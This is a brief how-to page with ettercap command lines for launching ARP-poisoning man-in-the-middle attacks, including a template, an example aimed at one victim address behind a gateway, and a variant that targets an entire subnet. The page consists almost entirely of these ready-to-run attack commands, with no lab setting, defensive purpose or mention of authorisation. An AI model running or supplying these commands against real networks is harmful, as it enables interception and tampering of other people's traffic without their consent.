Using ettercap to launch MITM attacks
sudo ettercap -T -i <interface-name> -M arp /<gateway/router ip-addr>/ /<victim ip-addr>/

for example; on interface "en1", if the gateway is "192.168.1.1" and the target is "192.168.1.47":

sudo ettercap -T -i en1 -M arp /192.168.1.1/ /192.168.1.47/

or to target the entire subnet:

sudo ettercap -T -i en1 -M arp /192.168.1.1/ //
Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-ShareAlike 3.0 License